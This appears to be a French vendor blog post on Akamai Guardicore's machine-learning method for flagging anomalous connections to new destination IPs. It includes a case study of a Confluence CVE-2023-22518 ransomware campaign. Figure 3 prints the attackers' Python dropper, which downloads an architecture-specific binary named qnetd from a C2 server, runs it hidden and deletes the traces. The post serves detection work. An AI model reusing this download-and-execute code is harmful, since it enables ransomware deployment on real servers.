Akamai Guardicore : Protéger le réseau contre les IP malveillantes

Akamai Guardicore : Protéger le réseau contre les IP malveillantes

560 420 2SB - Distributeur à valeur ajoutée - Solutions de Cybersécurité

La sécurisation du trafic réseau des entreprises est essentielle pour se prémunir contre les acteurs malveillants cherchant à nuire aux organisations et à causer des dommages parfois irréparables.
L’identification de nouvelles adresses IP de destination potentiellement malveillantes joue un rôle clé dans cette défense : on ne peut protéger ce que l’on ne connaît pas.

La capacité à détecter des connexions anormales vers ces adresses IP de destination encore inconnues constitue un atout majeur, en fournissant aux administrateurs des informations précieuses et des alertes sur les menaces potentielles.

La focalisation sur les adresses IP de destination inédites découle du constat que les acteurs malveillants exploitent fréquemment de nouvelles adresses IP pour contourner les mesures de sécurité traditionnelles.
Il est donc essentiel de prioriser les efforts de détection en conséquence.

Dans cet article, nous présentons une méthode d’apprentissage automatique permettant de détecter les connexions anormales vers de nouvelles adresses IP de destination accessibles depuis les nœuds d’un réseau d’entreprise.

Cette méthode repose sur l’exploitation des métadonnées de connexion.
Akamai utilise l’algorithme Word2Vec pour représenter les caractéristiques associées aux adresses IP de destination, avant d’appliquer une étape finale d’autoencodage.

Cette approche a été mise en œuvre lors d’une campagne en conditions réelles et s’est révélée efficace pour la détection.
Les adresses IP suspectes identifiées sont potentiellement liées à des activités malveillantes telles que des serveurs de commande et de contrôle (C2), des botnets ou des domaines d’hameçonnage.

Une détection rapide peut donc faire toute la différence entre une simple alerte et un incident majeur.

Passer à un incident réel

Identifier une nouvelle adresse IP de destination suspecte : un défi

La détection et l’atténuation des menaces liées aux nouvelles adresses IP de destination encore invisibles représentent un défi majeur.
En l’absence de données de réputation ou d’historique, ces adresses IP rendent les méthodes de détection traditionnelles inefficaces.
Leur nouveauté complique la distinction entre les premières communications légitimes et celles à caractère malveillant, car ces dernières peuvent imiter des schémas de trafic ordinaires.

Akamai a observé que l’analyse combinée de plusieurs paramètres tels que la séquence du processus source, le port de destination, le numéro de système autonome (ASN) et la géolocalisation associée à l’adresse IP, permettait de surmonter ces difficultés.
Cette approche contextuelle offre une vision plus complète du trafic réseau et améliore significativement la capacité à identifier et signaler les nouvelles adresses IP de destination suspectes.

Détection d’anomalies

La méthodologie d’Akamai Guardicore repose sur des techniques d’apprentissage automatique adaptées aux défis spécifiques de la détection d’anomalies dans le trafic réseau.
Akamai collecte diverses métadonnées issues des flux réseau, incluant des informations sur les processus sources, les ports de destination, les ASN, la géolocalisation, et bien d’autres éléments pertinents.
Des ensembles de données variés et bien catégorisés sont indispensables à une analyse approfondie et à une classification pertinente des comportements.

Pour faciliter cette analyse, Akamai regroupe les processus sources et les ports de destination selon leurs fonctions respectives.
Par exemple, les ports standards utilisés par différents serveurs SQL (tels que MSSQL – 1433 et MySQL – 3306) sont regroupés dans une même catégorie : serveur SQL.

Utilisation de l’apprentissage automatique pour la détection d’anomalies

Akamai utilise l’algorithme Word2Vec pour capturer les similarités sémantiques entre les adresses IP, en fonction du contexte observé dans les métadonnées réseau. Initialement conçu pour le traitement du langage naturel, Word2Vec apprend des représentations vectorielles en se basant sur le contexte d’apparition des éléments.

Dans cette approche, des séquences de métadonnées réseau en entrée de l’algorithme sont modélisées, afin qu’il apprenne des représentations vectorielles reflétant les relations comportementales entre adresses IP.
Cette modélisation contextuelle permet une détection plus efficace des anomalies et une meilleure reconnaissance de schémas comportementaux.

En représentant les adresses IP sous forme de vecteurs de grande dimension, l’algorithme identifie les ensembles d’adresses IP apparaissant fréquemment ensemble dans le trafic réseau.
Les adresses IP situées à proximité dans l’espace vectoriel présentent des relations contextuelles fortes, tandis que les valeurs aberrantes, plus éloignées sont susceptibles d’être anormales.
Cette approche offre ainsi une vision fine de la structure et de la dynamique du trafic réseau.

Dans la dernière étape de notre méthodologie, Akamai utilise un autoencodeur, un réseau neuronal artificiel dédié à l’apprentissage non supervisé, conçu pour compresser et reconstruire efficacement les données d’entrée.
Cet autoencodeur permet de détecter les anomalies sans recourir à des données d’entraînement étiquetées.
Il s’adapte ainsi à l’évolution des menaces et détecte efficacement de nouveaux schémas d’attaque.

Les caractéristiques vectorielles issues de Word2Vec sont transmises à l’autoencodeur, qui apprend à reconstruire les schémas normaux de trafic réseau (voir Figure 1).
Les connexions présentant une erreur de reconstruction élevée sont alors signalées comme potentiellement malveillantes.

secure-enterprise-networks-identify-malicious-ip-addresses-one
Fig. 1 : Exemple de modèle d’autoencodeur et de sorties

Validation des anomalies

L’un des principes fondamentaux de cette méthodologie repose sur l’analyse et l’apprentissage continus.
Grâce à l’algorithme d’Akamai, la solution est en mesure d’analyser chaque nouvelle adresse IP de destination et de vérifier quotidiennement l’ensemble des connexions associées, afin d’identifier les anomalies et, par conséquent, les comportements potentiellement malveillants.

La figure 2 illustre un exemple concret de production quotidienne pour un client : 462 nouvelles adresses IP de destination ont été détectées au cours de cette journée.

secure-enterprise-networks-identify-malicious-ip-addresses-two
Fig. 2 : Visualisation des nouvelles adresses IP dans le réseau d’un client en une seule journée
  • La ligne rouge horizontale représente le seuil à partir duquel une connexion est signalée comme anormale. Toute connexion présentant une erreur de reconstruction supérieure à ce seuil est considérée comme suspecte.
  • Les points bleus correspondent aux adresses IP jugées bénignes par notre système, car elles affichent de faibles erreurs de reconstruction et se conforment au modèle comportemental attendu du réseau.
  • Le point orange représente une adresse IP unique que notre analyse a identifiée comme anormale, en raison d’une erreur de reconstruction particulièrement élevée.

Cette anomalie a ensuite fait l’objet d’une investigation approfondie, confirmant qu’elle appartenait à une campagne d’attaque, ce qui souligne la robustesse et l’importance de nos mécanismes de détection. La section suivante décrit en détail cette attaque.

Comment l’algorithme d’Akamai a détecté avec succès une attaque dans un environnement client

Une nouvelle méthodologie peut sembler prometteuse en théorie, mais elle doit également prouver son efficacité en pratique.
Akamai a donc choisi de tester son algorithme sur une attaque précédemment observée, issue d’une campagne Confluence connue exploitant la vulnérabilité CVE-2023-22518.
Cette attaque a conduit à une exécution de code à distance (RCE), suivie du déploiement d’un rançongiciel.

Dans ce scénario, l’exploitation initiale a permis aux attaquants d’accéder illicitement à un serveur Confluence.
Ils ont ensuite établi une connexion à un serveur de commande et de contrôle (C2) via Python, puis téléchargé un fichier malveillant nommé qnetd (voir Figure 3).

python3 -c import os,sys,time import platform as p if sys.version_info.major == 3: import urllib.request as u else: import urllib2 as u h = /tmp/lru d = ./qnetd ml = {3x:[i386,i686], 6x:[x86_64,amd64], 3a:[arm], 6a:[aarch64]} try: m = p.machine().lower() if os.popen(id -u).read().strip() == 0: try: os.chdir(/var) except: os.chdir(/tmp) else: os.chdir(/tmp) for l in open(h): for k,al in ml.items(): for a in al: if a == m: l = l+.+k r = u.urlopen(l) with open(d, wb) as f: f.write(r.read()) f.flush() r.close() os.system(chmod +x +d) os.system(chmod 755 +d) os.system(d + > /dev/null 2>&1 &) time.sleep(5) os.remove(d) os.remove(h) except: if os.path.exists(h): os.remove(h) if os.path.exists(d): os.remove(d) pass 
Fig. 3 : Commande Python malveillante identifiée lors de l’enquête

Akamai a observé deux serveurs communiquant avec l’adresse IP malveillante, identifiée comme faisant partie de la campagne Atlassian Confluence CVE-2023-22518.

Les processus Python et qnetd associés à cette activité ont été détectés par cette méthode, notamment en raison d’une géolocalisation anormale de la connexion (voir Figure 4).

secure-enterprise-networks-identify-malicious-ip-addresses-three
Fig. 4 : Exemple de découverte

Permettre l’identification proactive des connexions réseau suspectes

La détection des connexions réseau anormales vers de nouvelles adresses IP de destination constitue un enjeu essentiel de la cybersécurité des entreprises.
En combinant Word2Vec et des techniques d’autoencodage, l’approche d’Akamai analyse les métadonnées du trafic réseau; telles que les processus sources, les ports de destination et la géolocalisation afin d’identifier les menaces potentielles susceptibles de contourner les mécanismes de détection traditionnels.

Dans une étude de cas réelle, cette méthode a permis de détecter avec succès une attaque sophistiquée exploitant la vulnérabilité Confluence CVE-2023-22518, démontrant ainsi son efficacité pour identifier une adresse IP malveillante impliquée dans une campagne de déploiement de ransomware.

Cette approche offre aux organisations la capacité d’identifier proactivement les connexions réseau suspectes, en apprenant et en signalant les écarts par rapport aux modèles de trafic normaux.

En savoir plus

Pour plus d’informations sur le service de recherche de menaces gérées, consultez la page web : Akamai Hunt.

Pour en savoir plus concernant NOS SOLUTIONS, n’hésitez pas à nous contacter ou demander un devis gratuitement

Source : Akamai Guardicore

Share
Tufin : Comment le SD-WAN optimise le réseau ?
Netskope : La solution ZTNA universelle

Start Typing